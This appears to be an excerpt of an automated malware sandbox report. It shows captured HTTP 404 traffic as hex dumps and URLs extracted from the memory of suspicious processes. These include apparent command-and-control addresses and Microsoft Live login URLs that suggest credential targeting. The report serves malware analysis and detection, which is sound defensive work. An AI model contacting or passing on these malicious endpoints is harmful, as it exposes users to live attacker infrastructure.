                Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundConnection: closecache-control: private, no-cache, no-store, must-revalidate, max-age=0pragma: no-cachecontent-type: text/htmlcontent-length: 1251date: Sun, 24 Nov 2024 07:14:55 GMTserver: LiteSpeedData Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0a 3c 68 74 6d 6c 20 73 74 79 6c 65 3d 22 68 65 69 67 68 74 3a 31 30 30 25 22 3e 0a 3c 68 65 61 64 3e 0a 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 76 69 65 77 70 6f 72 74 22 20 63 6f 6e 74 65 6e 74 3d 22 77 69 64 74 68 3d 64 65 76 69 63 65 2d 77 69 64 74 68 2c 20 69 6e 69 74 69 61 6c 2d 73 63 61 6c 65 3d 31 2c 20 73 68 72 69 6e 6b 2d 74 6f 2d 66 69 74 3d 6e 6f 22 20 2f 3e 0a 3c 74 69 74 6c 65 3e 20 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 0d 0a 3c 2f 74 69 74 6c 65 3e 3c 73 74 79 6c 65 3e 40 6d 65 64 69 61 20 28 70 72 65 66 65 72 73 2d 63 6f 6c 6f 72 2d 73 63 68 65 6d 65 3a 64 61 72 6b 29 7b 62 6f 64 79 7b 62 61 63 6b 67 72 6f 75 6e 64 2d 63 6f 6c 6f 72 3a 23 30 30 30 21 69 6d 70 6f 72 74 61 6e 74 7d 7d 3c 2f 73 74 79 6c 65 3e 3c 2f 68 65 61 64 3e 0a 3c 62 6f 64 79 20 73 74 79 6c 65 3d 22 63 6f 6c 6f 72 3a 20 23 34 34 34 3b 20 6d 61 72 67 69 6e 3a 30 3b 66 6f 6e 74 3a 20 6e 6f 72 6d 61 6c 20 31 34 70 78 2f 32 30 70 78 20 41 72 69 61 6c 2c 20 48 65 6c 76 65 74 69 63 61 2c 20 73 61 6e 73 2d 73 65 72 69 66 3b 20 68 65 69 67 68 74 3a 31 30 30 25 3b 20 62 61 63 6b 67 72 6f 75 6e 64 2d 63 6f 6c 6f 72 3a 20 23 66 66 66 3b 22 3e 0a 3c 64 69 76 20 73 74 79 6c 65 3d 22 68 65 69 67 68 74 3a 61 75 74 6f 3b 20 6d 69 6e 2d 68 65 69 67 68 74 3a 31 30 30 25 3b 20 22 3e 20 20 20 20 20 3c 64 69 76 20 73 74 79 6c 65 3d 22 74 65 78 74 2d 61 6c 69 67 6e 3a 20 63 65 6e 74 65 72 3b 20 77 69 64 74 68 3a 38 30 30 70 78 3b 20 6d 61 72 67 69 6e 2d 6c 65 66 74 3a 20 2d 34 30 30 70 78 3b 20 70 6f 73 69 74 69 6f 6e 3a 61 62 73 6f 6c 75 74 65 3b 20 74 6f 70 3a 20 33 30 25 3b 20 6c 65 66 74 3a 35 30 25 3b 22 3e 0a 20 20 20 20 20 20 20 20 3c 68 31 20 73 74 79 6c 65 3d 22 6d 61 72 67 69 6e 3a 30 3b 20 66 6f 6e 74 2d 73 69 7a 65 3a 31 35 30 70 78 3b 20 6c 69 6e 65 2d 68 65 69 67 68 74 3a 31 35 30 70 78 3b 20 66 6f 6e 74 2d 77 65 69 67 68 74 3a 62 6f 6c 64 3b 22 3e 34 30 34 3c 2f 68 31 3e 0a 3c 68 32 20 73 74 79 6c 65 3d 22 6d 61 72 67 69 6e 2d 74 6f 70 3a 32 30 70 78 3b 66 6f 6e 74 2d 73 69 7a 65 3a 20 33 30 70 78 3b 22 3e 4e 6f 74 20 46 6f 75 6e 64 0d 0a 3c 2f 68 32 3e 0a 3c 70 3e 54 68 65 20 72 65 73 6f 75 72 63 65 20 72 65 71 75 65 73 74 65 64 20 63 6f 75 6c 64 20 6e 6f 74 20 62 65 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 21 3c 2f 70 3e 0a 3c 2f 64 69 76 3e 3c 2f 64 69 76 3e 3c 64 69 76 20 73 74 79 6c 65 3d 22 63 6f 6c 6f 72 3a 23 66 30 66 30 66 30 3b 20 66 6f 6e 74 2d 73 69 7a 65 3a 31 32 70 78 3b 6d 61 72 67 69 6e 3a 61 75 74 6f 3b 70 61 64 64 69 6e 67 3a 30 70 78 20 33 30 70 78 20 30 70 78 20 33 30 70 78 3b 70 6f 73 69 74 69 6f 6e 3a 72 65 6c 61 74 69 76 65 3b 63 6c 65 61 72 3a 62 6f 74 68 3b 68 65 69 67 68 74 3a 31 30 30 70 78 3b 6d 61 72 67 69 6e 2d 74 6f 70 3a 2d 31 30 31
                Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundDate: Sun, 24 Nov 2024 07:15:02 GMTServer: ApacheContent-Length: 389Connection: closeContent-Type: text/htmlData Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 22 43 6f 6e 74 65 6e 74 2d 54 79 70 65 22 20 63 6f 6e 74 65 6e 74 3d 22 74 65 78 74 2f 68 74 6d 6c 3b 20 63 68 61 72 73 65 74 3d 77 69 6e 64 6f 77 73 2d 31 32 35 32 22 3e 0a 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0a 3c 68 31 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 0a 3c 70 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 77 61 73 20 6e 6f 74 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 2e 3c 2f 70 3e 0a 3c 70 3e 41 64 64 69 74 69 6f 6e 61 6c 6c 79 2c 20 61 20 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 0a 65 72 72 6f 72 20 77 61 73 20 65 6e 63 6f 75 6e 74 65 72 65 64 20 77 68 69 6c 65 20 74 72 79 69 6e 67 20 74 6f 20 75 73 65 20 61 6e 20 45 72 72 6f 72 44 6f 63 75 6d 65 6e 74 20 74 6f 20 68 61 6e 64 6c 65 20 74 68 65 20 72 65 71 75 65 73 74 2e 3c 2f 70 3e 0a 0a 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e Data Ascii: <!DOCTYPE html PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><meta http-equiv="Content-Type" content="text/html; charset=windows-1252"><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL was not found on this server.</p><p>Additionally, a 404 Not Founderror was encountered while trying to use an ErrorDocument to handle the request.</p></body></html>
                Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundDate: Sun, 24 Nov 2024 07:15:04 GMTServer: ApacheContent-Length: 389Connection: closeContent-Type: text/htmlData Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 22 43 6f 6e 74 65 6e 74 2d 54 79 70 65 22 20 63 6f 6e 74 65 6e 74 3d 22 74 65 78 74 2f 68 74 6d 6c 3b 20 63 68 61 72 73 65 74 3d 77 69 6e 64 6f 77 73 2d 31 32 35 32 22 3e 0a 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0a 3c 68 31 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 0a 3c 70 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 77 61 73 20 6e 6f 74 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 2e 3c 2f 70 3e 0a 3c 70 3e 41 64 64 69 74 69 6f 6e 61 6c 6c 79 2c 20 61 20 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 0a 65 72 72 6f 72 20 77 61 73 20 65 6e 63 6f 75 6e 74 65 72 65 64 20 77 68 69 6c 65 20 74 72 79 69 6e 67 20 74 6f 20 75 73 65 20 61 6e 20 45 72 72 6f 72 44 6f 63 75 6d 65 6e 74 20 74 6f 20 68 61 6e 64 6c 65 20 74 68 65 20 72 65 71 75 65 73 74 2e 3c 2f 70 3e 0a 0a 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e Data Ascii: <!DOCTYPE html PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><meta http-equiv="Content-Type" content="text/html; charset=windows-1252"><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL was not found on this server.</p><p>Additionally, a 404 Not Founderror was encountered while trying to use an ErrorDocument to handle the request.</p></body></html>
                Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundDate: Sun, 24 Nov 2024 07:15:07 GMTServer: ApacheContent-Length: 389Connection: closeContent-Type: text/htmlData Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 22 43 6f 6e 74 65 6e 74 2d 54 79 70 65 22 20 63 6f 6e 74 65 6e 74 3d 22 74 65 78 74 2f 68 74 6d 6c 3b 20 63 68 61 72 73 65 74 3d 77 69 6e 64 6f 77 73 2d 31 32 35 32 22 3e 0a 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0a 3c 68 31 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 0a 3c 70 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 77 61 73 20 6e 6f 74 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 2e 3c 2f 70 3e 0a 3c 70 3e 41 64 64 69 74 69 6f 6e 61 6c 6c 79 2c 20 61 20 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 0a 65 72 72 6f 72 20 77 61 73 20 65 6e 63 6f 75 6e 74 65 72 65 64 20 77 68 69 6c 65 20 74 72 79 69 6e 67 20 74 6f 20 75 73 65 20 61 6e 20 45 72 72 6f 72 44 6f 63 75 6d 65 6e 74 20 74 6f 20 68 61 6e 64 6c 65 20 74 68 65 20 72 65 71 75 65 73 74 2e 3c 2f 70 3e 0a 0a 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e Data Ascii: <!DOCTYPE html PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><meta http-equiv="Content-Type" content="text/html; charset=windows-1252"><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL was not found on this server.</p><p>Additionally, a 404 Not Founderror was encountered while trying to use an ErrorDocument to handle the request.</p></body></html>
                Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundDate: Sun, 24 Nov 2024 07:15:10 GMTServer: ApacheContent-Length: 389Connection: closeContent-Type: text/html; charset=utf-8Data Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 22 43 6f 6e 74 65 6e 74 2d 54 79 70 65 22 20 63 6f 6e 74 65 6e 74 3d 22 74 65 78 74 2f 68 74 6d 6c 3b 20 63 68 61 72 73 65 74 3d 77 69 6e 64 6f 77 73 2d 31 32 35 32 22 3e 0a 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0a 3c 68 31 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 0a 3c 70 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 77 61 73 20 6e 6f 74 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 2e 3c 2f 70 3e 0a 3c 70 3e 41 64 64 69 74 69 6f 6e 61 6c 6c 79 2c 20 61 20 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 0a 65 72 72 6f 72 20 77 61 73 20 65 6e 63 6f 75 6e 74 65 72 65 64 20 77 68 69 6c 65 20 74 72 79 69 6e 67 20 74 6f 20 75 73 65 20 61 6e 20 45 72 72 6f 72 44 6f 63 75 6d 65 6e 74 20 74 6f 20 68 61 6e 64 6c 65 20 74 68 65 20 72 65 71 75 65 73 74 2e 3c 2f 70 3e 0a 0a 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e Data Ascii: <!DOCTYPE html PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><meta http-equiv="Content-Type" content="text/html; charset=windows-1252"><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL was not found on this server.</p><p>Additionally, a 404 Not Founderror was encountered while trying to use an ErrorDocument to handle the request.</p></body></html>
                Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundDate: Sun, 24 Nov 2024 07:15:16 GMTContent-Type: text/htmlTransfer-Encoding: chunkedConnection: closecf-cache-status: DYNAMICReport-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=56iRVz82rYHHYtPbfv%2FJ1bfWXhYdXV4SfXyvSQDenMWt5waNgekkwIeY9WEA8C4%2BIXINiuyNmTncsLK6M7b2DkloPDvWN09mejHPX7zICGnL5uwYnuD9c8mvW%2Fb99gBnKv7Gr%2BwrLnaLkoDn"}],"group":"cf-nel","max_age":604800}NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}Server: cloudflareCF-RAY: 8e779b5e0bc48c72-EWRContent-Encoding: gzipalt-svc: h3=":443"; ma=86400server-timing: cfL4;desc="?proto=TCP&rtt=1773&sent=1&recv=3&lost=0&retrans=0&sent_bytes=0&recv_bytes=690&delivery_rate=0&cwnd=163&unsent_bytes=0&cid=0000000000000000&ts=0&x=0"Data Raw: 36 64 0d 0a 1f 8b 08 00 00 00 00 00 00 03 b3 c9 28 c9 cd b1 e3 e5 b2 c9 48 4d 4c b1 b3 29 c9 2c c9 49 b5 33 31 30 51 f0 cb 2f 51 70 cb 2f cd 4b b1 d1 87 08 da e8 83 95 f0 72 d9 24 e5 a7 54 82 e8 e4 d4 bc 92 d4 22 3b 9b 0c 43 74 1d 19 86 76 36 fa 50 69 90 d9 45 76 30 c5 79 e9 99 79 15 c8 72 fa 30 d3 f4 a1 2e 01 00 0b d9 61 33 92 00 00 00 0d 0a 30 0d 0a 0d 0a Data Ascii: 6d(HML),I310Q/Qp/Kr$T";Ctv6PiEv0yyr0.a30
                Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundDate: Sun, 24 Nov 2024 07:15:19 GMTContent-Type: text/htmlTransfer-Encoding: chunkedConnection: closecf-cache-status: DYNAMICReport-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=8FmxdIQ3pf%2Bq5HA%2BoI9X3Qd3lvwSWkusOaGqom8JdMb5mwbpWnNtPVoo8VwzzX8u5i5LeE8PFEfun6Fx9gZEkbn7P%2Bnca9oGo94MooRAvj7gRmwcBiFMog3J5oUNuegDseD34ndOQSKDXVz0"}],"group":"cf-nel","max_age":604800}NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}Server: cloudflareCF-RAY: 8e779b6ebe935e7d-EWRContent-Encoding: gzipalt-svc: h3=":443"; ma=86400server-timing: cfL4;desc="?proto=TCP&rtt=1547&sent=1&recv=3&lost=0&retrans=0&sent_bytes=0&recv_bytes=714&delivery_rate=0&cwnd=222&unsent_bytes=0&cid=0000000000000000&ts=0&x=0"Data Raw: 36 64 0d 0a 1f 8b 08 00 00 00 00 00 00 03 b3 c9 28 c9 cd b1 e3 e5 b2 c9 48 4d 4c b1 b3 29 c9 2c c9 49 b5 33 31 30 51 f0 cb 2f 51 70 cb 2f cd 4b b1 d1 87 08 da e8 83 95 f0 72 d9 24 e5 a7 54 82 e8 e4 d4 bc 92 d4 22 3b 9b 0c 43 74 1d 19 86 76 36 fa 50 69 90 d9 45 76 30 c5 79 e9 99 79 15 c8 72 fa 30 d3 f4 a1 2e 01 00 0b d9 61 33 92 00 00 00 0d 0a 30 0d 0a 0d 0a Data Ascii: 6d(HML),I310Q/Qp/Kr$T";Ctv6PiEv0yyr0.a30
                Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundDate: Sun, 24 Nov 2024 07:15:22 GMTContent-Type: text/htmlTransfer-Encoding: chunkedConnection: closecf-cache-status: DYNAMICReport-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=3LcPh%2FKNuOOVm%2FpjcbMQLpLUJyTcXZyZwgrQaAW31bwVtTvuWDVRHOkwVQekiOxQdGXzcVsAfO4esPjdR8AF24eZ%2FSbNuFZOlInZj2lDjtaJO6RZ3xRydUBvA5tLQBZJD5Yw6Ncxk1WSXXHh"}],"group":"cf-nel","max_age":604800}NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}Server: cloudflareCF-RAY: 8e779b7f19664392-EWRContent-Encoding: gzipalt-svc: h3=":443"; ma=86400server-timing: cfL4;desc="?proto=TCP&rtt=1573&sent=1&recv=4&lost=0&retrans=0&sent_bytes=0&recv_bytes=1727&delivery_rate=0&cwnd=230&unsent_bytes=0&cid=0000000000000000&ts=0&x=0"Data Raw: 36 64 0d 0a 1f 8b 08 00 00 00 00 00 00 03 b3 c9 28 c9 cd b1 e3 e5 b2 c9 48 4d 4c b1 b3 29 c9 2c c9 49 b5 33 31 30 51 f0 cb 2f 51 70 cb 2f cd 4b b1 d1 87 08 da e8 83 95 f0 72 d9 24 e5 a7 54 82 e8 e4 d4 bc 92 d4 22 3b 9b 0c 43 74 1d 19 86 76 36 fa 50 69 90 d9 45 76 30 c5 79 e9 99 79 15 c8 72 fa 30 d3 f4 a1 2e 01 00 0b d9 61 33 92 00 00 00 0d 0a 30 0d 0a 0d 0a Data Ascii: 6d(HML),I310Q/Qp/Kr$T";Ctv6PiEv0yyr0.a30
                Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundDate: Sun, 24 Nov 2024 07:15:24 GMTContent-Type: text/htmlTransfer-Encoding: chunkedConnection: closecf-cache-status: DYNAMICReport-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=WjFf8F8XyA3lxztUDi8UFjl52I2VDdkS5WewFsuUDLrY6XzXLZvZNVWGInnRDPaJGZOo02PsbnoXPI6ugaQpVjJ1O4LHeFk%2Bc8%2Fyib8XE1ljIMpedAB1nc2fZdzAdfIv9CzTV%2BN4fzx%2BIEZe"}],"group":"cf-nel","max_age":604800}NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}Server: cloudflareCF-RAY: 8e779b900e8b80da-EWRalt-svc: h3=":443"; ma=86400server-timing: cfL4;desc="?proto=TCP&rtt=1478&sent=1&recv=3&lost=0&retrans=0&sent_bytes=0&recv_bytes=409&delivery_rate=0&cwnd=128&unsent_bytes=0&cid=0000000000000000&ts=0&x=0"Data Raw: 39 32 0d 0a 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 6e 67 69 6e 78 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a 0d 0a 30 0d 0a 0d 0a Data Ascii: 92<html><head><title>404 Not Found</title></head><body><center><h1>404 Not Found</h1></center><hr><center>nginx</center></body></html>0
                Source: icsunattend.exe, 00000007.00000002.3145271641.0000000004F24000.00000004.10000000.00040000.00000000.sdmp, VgGNmkZfWSSE.exe, 0000000A.00000002.3144406739.00000000030C4000.00000004.00000001.00040000.00000000.sdmp, firefox.exe, 0000000C.00000002.2115971735.0000000027284000.00000004.80000000.00040000.00000000.sdmpString found in binary or memory: http://funnystory.online/2dyu/?9HaD=bADo
                Source: VgGNmkZfWSSE.exe, 0000000A.00000002.3143475754.00000000011EA000.00000040.80000000.00040000.00000000.sdmpString found in binary or memory: http://www.heliopsis.xyz
                Source: VgGNmkZfWSSE.exe, 0000000A.00000002.3143475754.00000000011EA000.00000040.80000000.00040000.00000000.sdmpString found in binary or memory: http://www.heliopsis.xyz/cclj/
                Source: icsunattend.exe, 00000007.00000002.3145271641.00000000050B6000.00000004.10000000.00040000.00000000.sdmp, VgGNmkZfWSSE.exe, 0000000A.00000002.3144406739.0000000003256000.00000004.00000001.00040000.00000000.sdmpString found in binary or memory: https://2domains.ru
                Source: icsunattend.exe, 00000007.00000002.3147151350.00000000076EE000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://ac.ecosia.org/autocomplete?q=
                Source: icsunattend.exe, 00000007.00000002.3147151350.00000000076EE000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://cdn.ecosia.org/assets/images/ico/favicon.icohttps://www.ecosia.org/search?q=
                Source: icsunattend.exe, 00000007.00000002.3147151350.00000000076EE000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://ch.search.yahoo.com/favicon.icohttps://ch.search.yahoo.com/search
                Source: icsunattend.exe, 00000007.00000002.3147151350.00000000076EE000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://ch.search.yahoo.com/sugg/chrome?output=fxjson&appid=crmas&command=
                Source: icsunattend.exe, 00000007.00000002.3147151350.00000000076EE000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://duckduckgo.com/ac/?q=
                Source: icsunattend.exe, 00000007.00000002.3147151350.00000000076EE000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://duckduckgo.com/chrome_newtab
                Source: icsunattend.exe, 00000007.00000002.3147151350.00000000076EE000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://duckduckgo.com/favicon.icohttps://duckduckgo.com/?q=
                Source: icsunattend.exe, 00000007.00000002.3145271641.00000000050B6000.00000004.10000000.00040000.00000000.sdmp, VgGNmkZfWSSE.exe, 0000000A.00000002.3144406739.0000000003256000.00000004.00000001.00040000.00000000.sdmpString found in binary or memory: https://files.reg.ru/fonts/inter/Inter-Medium.woff)
                Source: icsunattend.exe, 00000007.00000002.3145271641.00000000050B6000.00000004.10000000.00040000.00000000.sdmp, VgGNmkZfWSSE.exe, 0000000A.00000002.3144406739.0000000003256000.00000004.00000001.00040000.00000000.sdmpString found in binary or memory: https://files.reg.ru/fonts/inter/Inter-Medium.woff2)
                Source: icsunattend.exe, 00000007.00000002.3145271641.00000000050B6000.00000004.10000000.00040000.00000000.sdmp, VgGNmkZfWSSE.exe, 0000000A.00000002.3144406739.0000000003256000.00000004.00000001.00040000.00000000.sdmpString found in binary or memory: https://files.reg.ru/fonts/inter/Inter-Regular.woff)
                Source: icsunattend.exe, 00000007.00000002.3145271641.00000000050B6000.00000004.10000000.00040000.00000000.sdmp, VgGNmkZfWSSE.exe, 0000000A.00000002.3144406739.0000000003256000.00000004.00000001.00040000.00000000.sdmpString found in binary or memory: https://files.reg.ru/fonts/inter/Inter-Regular.woff2)
                Source: icsunattend.exe, 00000007.00000002.3145271641.00000000050B6000.00000004.10000000.00040000.00000000.sdmp, VgGNmkZfWSSE.exe, 0000000A.00000002.3144406739.0000000003256000.00000004.00000001.00040000.00000000.sdmpString found in binary or memory: https://files.reg.ru/fonts/inter/Inter-SemiBold.woff)
                Source: icsunattend.exe, 00000007.00000002.3145271641.00000000050B6000.00000004.10000000.00040000.00000000.sdmp, VgGNmkZfWSSE.exe, 0000000A.00000002.3144406739.0000000003256000.00000004.00000001.00040000.00000000.sdmpString found in binary or memory: https://files.reg.ru/fonts/inter/Inter-SemiBold.woff2)
                Source: icsunattend.exe, 00000007.00000003.2004505152.00000000028A1000.00000004.00000020.00020000.00000000.sdmp, icsunattend.exe, 00000007.00000002.3142248419.0000000002874000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://login.live.com/oauth20_authorize.srf?client_id=00000000480728C5&scope=service::ssl.live.com:
                Source: icsunattend.exe, 00000007.00000003.2004505152.00000000028A1000.00000004.00000020.00020000.00000000.sdmp, icsunattend.exe, 00000007.00000002.3142248419.0000000002874000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://login.live.com/oauth20_authorize.srfclient_id=00000000480728C5&scope=service::ssl.live.com::
                Source: icsunattend.exe, 00000007.00000003.2004505152.00000000028A1000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://login.live.com/oauth20_desktop.srf&lw=1&fl=wld2
                Source: icsunattend.exe, 00000007.00000002.3142248419.0000000002874000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://login.live.com/oauth20_desktop.srf&lw=1&fl=wld2&
                Source: icsunattend.exe, 00000007.00000002.3142248419.0000000002874000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://login.live.com/oauth20_desktop.srf?lc=1033
                Source: icsunattend.exe, 00000007.00000002.3142248419.0000000002874000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://login.live.com/oauth20_desktop.srflc=1033
                Source: icsunattend.exe, 00000007.00000002.3142248419.0000000002874000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://login.live.com/oauth20_logout.srf?client_id=00000000480728C5&redirect_uri=https://login.live
                Source: icsunattend.exe, 00000007.00000002.3142248419.0000000002874000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://login.live.com/oauth20_logout.srfclient_id=00000000480728C5&redirect_uri=https://login.live.
                Source: icsunattend.exe, 00000007.00000003.2003224862.00000000076CE000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://login.live.com/oauth20_logout.srfhttps://login.live.com/oauth20_authorize.srfhttps://login.l
                Source: icsunattend.exe, 00000007.00000002.3145271641.00000000050B6000.00000004.10000000.00040000.00000000.sdmp, VgGNmkZfWSSE.exe, 0000000A.00000002.3144406739.0000000003256000.00000004.00000001.00040000.00000000.sdmpString found in binary or memory: https://reg.ru?target=_blank
                Source: VgGNmkZfWSSE.exe, 0000000A.00000002.3144406739.0000000003256000.00000004.00000001.00040000.00000000.sdmpString found in binary or memory: https://server194.hosting.reg.ru/manager
                Source: icsunattend.exe, 00000007.00000002.3147151350.00000000076EE000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://www.ecosia.org/newtab/
                Source: icsunattend.exe, 00000007.00000002.3145271641.00000000050B6000.00000004.10000000.00040000.00000000.sdmp, VgGNmkZfWSSE.exe, 0000000A.00000002.3144406739.0000000003256000.00000004.00000001.00040000.00000000.sdmpString found in binary or memory: https://www.reg.ru/dedicated/?utm_source=&utm_medium=expired&utm_campaign
                Source: icsunattend.exe, 00000007.00000002.3145271641.00000000050B6000.00000004.10000000.00040000.00000000.sdmp, VgGNmkZfWSSE.exe, 0000000A.00000002.3144406739.0000000003256000.00000004.00000001.00040000.00000000.sdmpString found in binary or memory: https://www.reg.ru/hosting/?utm_source=&utm_medium=expired&utm_campaign
                Source: icsunattend.exe, 00000007.00000002.3145271641.00000000050B6000.00000004.10000000.00040000.00000000.sdmp, VgGNmkZfWSSE.exe, 0000000A.00000002.3144406739.0000000003256000.00000004.00000001.00040000.00000000.sdmpString found in binary or memory: https://www.reg.ru/ssl-certificate/?utm_source=&utm_medium=expired&utm_campaign
                Source: icsunattend.exe, 00000007.00000002.3145271641.00000000050B6000.00000004.10000000.00040000.00000000.sdmp, VgGNmkZfWSSE.exe, 0000000A.00000002.3144406739.0000000003256000.00000004.00000001.00040000.00000000.sdmpString found in binary or memory: https://www.reg.ru/support/#request
                Source: icsunattend.exe, 00000007.00000002.3145271641.00000000050B6000.00000004.10000000.00040000.00000000.sdmp, VgGNmkZfWSSE.exe, 0000000A.00000002.3144406739.0000000003256000.00000004.00000001.00040000.00000000.sdmpString found in binary or memory: https://www.reg.ru/support/hosting-i-servery/moy-sayt-ne-rabotaet/oshibka-404
                Source: icsunattend.exe, 00000007.00000002.3145271641.00000000050B6000.00000004.10000000.00040000.00000000.sdmp, VgGNmkZfWSSE.exe, 0000000A.00000002.3144406739.0000000003256000.00000004.00000001.00040000.00000000.sdmpString found in binary or memory: https://www.reg.ru/vps/?utm_source=&utm_medium=expired&utm_campaign
